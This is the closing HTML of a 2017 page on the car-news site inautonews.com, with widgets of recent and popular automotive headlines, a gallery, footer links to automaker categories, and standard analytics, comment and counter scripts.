                    <img src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Opel-Insignia-Sports-Tourer-is-official-4-800x450.jpg" alt="2017 Opel Insignia Sports Tourer is official" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/2017-opel-insignia-sports-tourer-is-official">2017 Opel Insignia Sports Tourer is official</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-02-06T06:51:52+00:00">February 6, 2017</time></span>                            </div>
                        </div>
                    
                </li>
					</ul>
	
</div>            
			<div class="widget tabbertabs" id="wpzoom-tabber-2"><div class="tabber"><div id="wpzoom-feature-posts-2" class="tabbertab feature-posts"><h2 class="widgettitle">Recent Posts</h2>
<ul class="feature-posts-list"><li><div class="post-thumb"><a href="http://www.inautonews.com/volkswagen-has-a-new-subbrand-electrify-america"><img src="http://www.inautonews.com/wp-content/uploads/2017/02/Volkswagen-has-a-new-subbrand-–-Electrify-America-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/volkswagen-has-a-new-subbrand-electrify-america">Volkswagen has a new subbrand – Electrify America</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/report-volvo-xc40-coming-out-to-play-this-year"><img src="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/report-volvo-xc40-coming-out-to-play-this-year">Report – Volvo XC40 coming out to play this year</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/classics-ebay-find-of-the-week-is-a-1976-jensen-interceptor"><img src="http://www.inautonews.com/wp-content/uploads/2017/02/Classics-–-eBay-find-of-the-week-is-a-1976-Jensen-Interceptor-0-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/classics-ebay-find-of-the-week-is-a-1976-jensen-interceptor">Classics – eBay find of the week is a 1976 Jensen Interceptor</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/classics-jaguar-sport-xjr-15-is-even-rarer-than-xj220-but-heres-one-for-you"><img src="http://www.inautonews.com/wp-content/uploads/2017/02/Classics-Jaguar-Sport-XJR-15-is-even-rarer-than-XJ220-but-here’s-one-for-you-0-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/classics-jaguar-sport-xjr-15-is-even-rarer-than-xj220-but-heres-one-for-you">Classics &#8211; Jaguar Sport XJR-15 is even rarer than XJ220 but here’s one for you</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/is-the-pagani-huayra-roadster-getting-the-gullwing-doors"><img src="http://www.inautonews.com/wp-content/uploads/2017/02/Is-the-Pagani-Huayra-Roadster-getting-the-gullwing-doors-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/is-the-pagani-huayra-roadster-getting-the-gullwing-doors">Is the Pagani Huayra Roadster getting the gullwing doors?!</a></h3><br /><div class="clear"></div></li></ul><div class="clear"></div></div><div id="widget_tptn_pop-3" class="tabbertab widget_widget_tptn_pop"><h2 class="widgettitle">Most Popular Now</h2>
<div class="tptn_posts tptn_posts_widget"><ul class="feature-posts-list"><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/list-of-world-record-highways" rel="bookmark"  class="tptn_link"><span class="tptn_title">List of World record highways</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/10-busiest-junctions-in-the-world" rel="bookmark"  class="tptn_link"><span class="tptn_title">10 Busiest Junctions in the world</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/mclaren-denies-dennis-to-challenge-new-fia-rule" rel="bookmark"  class="tptn_link"><span class="tptn_title">McLaren denies Dennis to challenge new FIA rule</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/mclaren-denies-dennis-to-challenge-new-fia-rule" rel="bookmark"  class="tptn_link"><span class="tptn_title">McLaren denies Dennis to challenge new FIA rule</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/jackie-stewart-tells-mercedes-to-quit-f1" rel="bookmark"  class="tptn_link"><span class="tptn_title">Jackie Stewart tells Mercedes to quit F1</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/jackie-stewart-tells-mercedes-to-quit-f1" rel="bookmark"  class="tptn_link"><span class="tptn_title">Jackie Stewart tells Mercedes to quit F1</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/hamilton-to-ferrari-rumours-fire-in-bahrain" rel="bookmark"  class="tptn_link"><span class="tptn_title">Hamilton-to-Ferrari rumours fire in Bahrain</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/ferrari-re-opens-door-to-working-with-red-bull" rel="bookmark"  class="tptn_link"><span class="tptn_title">Ferrari re-opens door to working with Red Bull</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/2015-frankfurt-motor-show-live-2016-skoda-superb-combi-sportline" rel="bookmark"  class="tptn_link"><span class="tptn_title">2015 Frankfurt Motor Show LIVE: 2016 Skoda Superb Combi&hellip;</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/bottas-signs-deal-to-replace-raikkonen-report" rel="bookmark"  class="tptn_link"><span class="tptn_title">Bottas signs deal to replace Raikkonen &#8211; report</span></a></span></h3></li></ul></div></div></div>
			<div class="clear"></div></div><div class="widget widget_widget_tptn_pop" id="widget_tptn_pop-2"><h3 class="title"><span>Latest Galeries</span></h3></div><div class="clear"></div>
<div class="gallery2-class">
<a href='http://www.inautonews.com/classics-ebay-find-of-the-week-is-a-1976-jensen-interceptor/classics-ebay-find-of-the-week-is-a-1976-jensen-interceptor-0'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/02/Classics-–-eBay-find-of-the-week-is-a-1976-Jensen-Interceptor-0-150x84.jpg" class="attachment-thumbnail" alt="Classics – eBay find of the week is a 1976 Jensen Interceptor 0" /></a><a href='http://www.inautonews.com/classics-jaguar-sport-xjr-15-is-even-rarer-than-xj220-but-heres-one-for-you/classics-jaguar-sport-xjr-15-is-even-rarer-than-xj220-but-heres-one-for-you-0'><img width="150" height="113" src="http://www.inautonews.com/wp-content/uploads/2017/02/Classics-Jaguar-Sport-XJR-15-is-even-rarer-than-XJ220-but-here’s-one-for-you-0-150x113.jpg" class="attachment-thumbnail" alt="Classics - Jaguar Sport XJR-15 is even rarer than XJ220 but here’s one for you 0" /></a><a href='http://www.inautonews.com/2017-chicago-auto-show-vw-atlas-weekend-edition/2017-chicago-auto-show-vw-atlas-weekend-edition-0'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Chicago-Auto-Show-VW-Atlas-Weekend-Edition-0-150x84.jpg" class="attachment-thumbnail" alt="2017 Chicago Auto Show VW Atlas Weekend Edition 0" /></a><a href='http://www.inautonews.com/2017-mercedes-benz-vito-can-also-be-used-as-a-london-black-cab/2017-mercedes-benz-vito-can-also-be-used-as-a-london-black-cab-1'><img width="150" height="97" src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Mercedes-Benz-Vito-can-also-be-used-as-a-London-Black-Cab-1-150x97.jpg" class="attachment-thumbnail" alt="2017 Mercedes Benz Vito can also be used as a London Black Cab 1" /></a><a href='http://www.inautonews.com/skoda-kicks-off-production-of-the-quirky-octavia-refresh/skoda-kicks-off-production-of-the-quirky-octavia-refresh-0'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/02/Skoda-kicks-off-production-of-the-quirky-Octavia-refresh-0-150x84.jpg" class="attachment-thumbnail" alt="Skoda kicks off production of the quirky Octavia refresh 0" /></a><a href='http://www.inautonews.com/2017-chicago-auto-show-infiniti-q50-qx80-signature-edition/2017-chicago-auto-show-infiniti-q50-qx80-signature-edition-0'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Chicago-Auto-Show-Infiniti-Q50-QX80-Signature-Edition-0-150x84.jpg" class="attachment-thumbnail" alt="2017 Chicago Auto Show Infiniti Q50 &amp; QX80 Signature Edition 0" /></a></div></div>

    </main><!-- #main -->

    <footer id="colophon" class="site-footer" role="contentinfo">

<div class="footer-widgets widgets widget-columns-3">
                    <div class="column">
                      <div class="widget widget_text" id="text-4"><h3 class="title">Receive Our Newsletter</h3>
                      <div style="float:left; height:50px; margin:0px;"><form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=inautonews', 'popupwindow', 'scrollbars=yes,width=570,height=600');return true"><input type="text" style="width:65%; height:40px; margin-top:0px; border: 1px solid #c7c7c7; background-color:#f9f9f9;" name="email"/><input type="hidden" value="inautonews" name="uri"/><input type="hidden" name="loc" value="en_US"/><input type="submit" style="margin:10px 0px 0px 5px;" value="Subscribe"/></form></div>
                      </div>
                      
		<div class="clear"></div></div>                    <!-- .column -->
                
                    <div class="column">
                        <div class="widget widget_text" id="text-4"><h3 class="title">Subscribe to RSS</h3>	
                        		
		<div class="clear"></div></div>                    </div><!-- .column -->
             
                    <div class="column">
                        <div class="widget widget_text" id="text-5"><h3 class="title">Follow us on Social Media</h3>
                        <div class="share" style="float:left;">
                            <a href="https://twitter.com/inautonews" target="_blank" title="Inautonws on Twitter" class="twitter"></a>
                            <a href="https://www.facebook.com/inautonews" target="_blank" title="Inautonws on Facebook" class="facebook"></a>
                            <a href="https://plus.google.com/+Inautonewsplus" target="_blank" title="Inautonews on Google+" class="gplus"></a>
                            <div class="clear"></div>
                        </div>
		<div class="clear"></div></div>                    </div><!-- .column -->

                
                    <div class="column">
                                            </div><!-- .column -->

                
                  <div class="clear"></div>
            </div><!-- .footer-widgets -->
            
            
            <div id="title_message">
            <div class="footer-widgets widgets widget-columns-4">
                
<div class="column">
<div class="widget widget_text" id="text-4"> <h3 class="title">News</h3> </div>
<div style=" margin-top:-20px;">
<a href="http://www.inautonews.com/category/home/news">All the news ordered by time</a> <br />
<a href="http://www.inautonews.com/category/home/producers">Industry</a> <br />
<a href="http://www.inautonews.com/category/home/technology">Technology</a> <br />
<a href="http://www.inautonews.com/category/home/technology">Tuners</a> <br />
<a href="http://www.inautonews.com/category/home/videos">Videos</a> <br />
<a href="http://www.inautonews.com/category/home/safety-home">Safety</a> <br />
<a href="http://www.inautonews.com/category/home/car-crashes">Car Crashes</a> <br />
<a href="http://www.inautonews.com/category/home/concept">Concepts</a> <br />
<a href="http://www.inautonews.com/category/home/spy">Spy Photos</a> <br /><br />
</div>
<div class="widget widget_text" id="text-4"> <h3 class="title">IN DEPTH</h3> </div>
<div style=" margin-top:-20px;">
<a href="http://www.inautonews.com/category/home/motor-shows">Motor Shows</a> <br />
     <a href="http://www.inautonews.com/category/home/motorsport">Motor Sport</a> <br />
     <a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a> <br />
     <a href="http://www.inautonews.com/category/home/editors">Editors Choice</a> <br />
</div>
		<div class="clear"></div></div>                    <!-- .column -->
                
                    <div class="column">
                        <div class="widget widget_text" id="text-4"><h3 class="title">Automakers</h3>			<div class="textwidget"></div>
     <a href="http://www.inautonews.com/category/manufacturers/acura">Acura</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/alfa">Alfa Romeo</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/aston-martin">Aston Martin</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/audi">Audi</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bentley">Bentley</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bmw">BMW</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bugatti">Bugatti</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/buick">Buick</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/cadillac">Cadillac</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/caterham">Caterharm</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/chevrolet">Chevrolet</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/chrysler">Chrysler</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/citroen">Citroen</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dacia">Dacia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dodge">Dodge</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/ferrari">Ferrari</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/fiat">Fiat</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/fiat">Fisker</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/ford">Ford</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/gmc">GMC</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/holden">Holden</a> <br />
	 <div class="clear"></div></div>                    </div><!-- .column -->
     <div class="column">
     <div class="widget widget_text" id="text-5"><h3 class="title"></h3>			<div class="textwidget"></div>
    <a href="http://www.inautonews.com/category/manufacturers/honda">Honda</a> <br />
          <a href="http://www.inautonews.com/category/manufacturers/hummer">Hummer</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/hyundai">Hyundai</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/infiniti">Infiniti</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/jaguar">Jaguar</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/jeep">Jeep</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/kia">Kia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/koenigsegg">Koenigsegg</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lamborghini">Lamborghini</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lancia">Lancia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/land-rover">Land Rover</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lexus">Lexus</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lotus">Lotus</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lincoln">Lincoln</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mclaren">McLaren</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/maserati">Maserati</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mazda">Mazda</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/maybach">Mayback</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mercedes">Mercede-Benz</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mini">Mini</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mitsubishi">Mitshubishi</a> <br />
	 <div class="clear"></div></div></div><!-- .column -->
     <div class="column">
     <div class="widget widget_text" id="text-5"><h3 class="title"></h3><div class="textwidget"></div>
    <a href="http://www.inautonews.com/category/manufacturers/nissan">Nissan</a> <br />
         <a href="http://www.inautonews.com/category/manufacturers/pagani">Pagani</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/peugeot">Peugeot</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/porsche">Porsche</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/opel">Opel</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dodge">RAM</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/renault">Renault</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/rolls">Rolls Royce</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/saab">Saab</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/saturn">Saturn</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/scion">Scion</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/seat">Seat</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/skoda">Skoda</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/spyker">Spyker</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/subaru">Subaru</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/suzuki">Suzuki</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/tata">Tata</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/tesla">Tesla</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/vauxhall">Vauxhall</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/volkswagen">Volkswagen</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/toyota">Toyota</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/volvo">Volvo</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/others">Others</a> <br />
	 <div class="clear"></div></div>                    </div><!-- .column -->
                    <div class="column">
                                            </div><!-- .column -->

                
                  <div class="clear"></div>
            </div><!-- .footer-widgets -->
            </div>

       <!-- .footer-widgets -->

            <hr class="site-footer-separator">

      


        <div class="site-info">
            <p class="copyright">
                Copyright &copy; 2017 &mdash; INAUTONEWS. All Rights Reserved<br >
                
                <a href="http://www.inautonews.com/singles/about.html">About us</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;<a href="http://www.inautonews.com/singles/advertise.html">Advertisement</a>&nbsp;&nbsp;&nbsp;      /&nbsp;&nbsp;&nbsp;     <a href="http://www.inautonews.com/singles/contact.html">Contact</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;     <a href="http://www.inautonews.com/singles/tip.html">Send us a tip</a>&nbsp;&nbsp;&nbsp; /&nbsp;&nbsp;&nbsp;
<a href="http://www.inautonews.com/singles/terms.html">Term of Use</a>&nbsp;&nbsp;&nbsp; /&nbsp;&nbsp;&nbsp;<a href="http://www.inautonews.com/singles/privacy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;<a href="https://plus.google.com/+Inautonewsplus" rel="publisher">Google+</a>
            </p>

         
        </div><!-- .site-info -->
    </footer><!-- #colophon -->

</div>
<script>(function($){$(document).ready(function(){});})(jQuery);</script><script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/comment-reply.min.js?ver=4.1.15'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.mmenu.min.all.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.touchSwipe.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.carouFredSel-6.2.1-packed.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/flickity.pkgd.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.fitvids.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/superfish.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/tabs.js?ver=1.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var zoomOptions = {"slideshow_auto":"1","slideshow_speed":"3000"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/functions.js?ver=1.0'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201706'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/js/galleria.js'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/js/wzslider.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var embedVars = {"disqusConfig":{"platform":"wordpress@4.1.15","language":""},"disqusIdentifier":"304541 http:\/\/www.inautonews.com\/?p=304541","disqusShortname":"ina2","disqusTitle":"Report \u2013 Volvo XC40 coming out to play this year","disqusUrl":"http:\/\/www.inautonews.com\/report-volvo-xc40-coming-out-to-play-this-year","options":{"manualSync":false},"postId":"304541"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var countVars = {"disqusShortname":"ina2"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.15'></script>

<!-- Histats.com  START (hidden counter)-->
<script type="text/javascript">document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E"));</script>
<a href="http://www.histats.com" rel="nofollow" target="_blank" title="free site statistics" ><script  type="text/javascript" >
try {Histats.start(1,976179,4,0,0,0,"");
Histats.track_hits();} catch(err){};
</script></a>
<noscript><a href="http://www.histats.com" target="_blank"><img  src="http://sstatic1.histats.com/0.gif?976179&101" alt="free site statistics" border="0"></a></noscript>
<!-- Histats.com  END  -->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-7100910-2', 'auto');
  ga('send', 'pageview');

</script>
</body>
</html>